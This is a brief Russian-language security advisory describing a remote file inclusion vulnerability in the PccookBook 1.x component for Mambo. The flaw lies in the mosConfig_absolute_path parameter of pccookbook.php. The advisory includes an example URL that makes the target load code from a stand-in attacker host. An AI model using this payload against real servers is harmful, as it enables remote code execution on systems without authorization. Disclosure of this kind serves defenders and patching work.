Программа: PccookBook 1.x (компонент Mambo)

Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP код
на целевой системе. Данные, переданные в
параметре mosConfig_absolute_path скрипта pccookbook.php не
проверяются, в результате атакующий может
подключить произвольный локальный и
внешний файл. Для работы требуется что бы
опция "register_globals" была включена.

Пример:

http://[target]/[path]/components/com_pccookbook/pccookbook.php? mosConfi
g_absolute_path=http://attacker.com/evil.txt?



Оставить мнение